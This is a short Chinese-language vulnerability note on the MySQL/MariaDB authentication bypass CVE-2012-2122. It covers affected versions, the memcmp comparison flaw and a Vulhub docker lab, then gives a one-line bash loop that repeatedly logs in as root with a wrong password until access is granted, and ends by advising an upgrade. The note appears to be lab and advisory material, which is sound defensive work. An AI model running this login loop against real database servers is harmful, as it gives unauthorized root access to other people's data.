影响范围
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
漏洞类型
身份认证绕过
利用条件
在影响范围内的应用
漏洞概述
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的,也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
漏洞复现
环境搭建
这里使用Vulhub来搭建环境:
docker-compose up -d
环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456
漏洞利用
在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:
for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done
安全建议
升级mysql版本~
参考链接
https://vulhub.org/#/environments/mysql/CVE-2012-2122/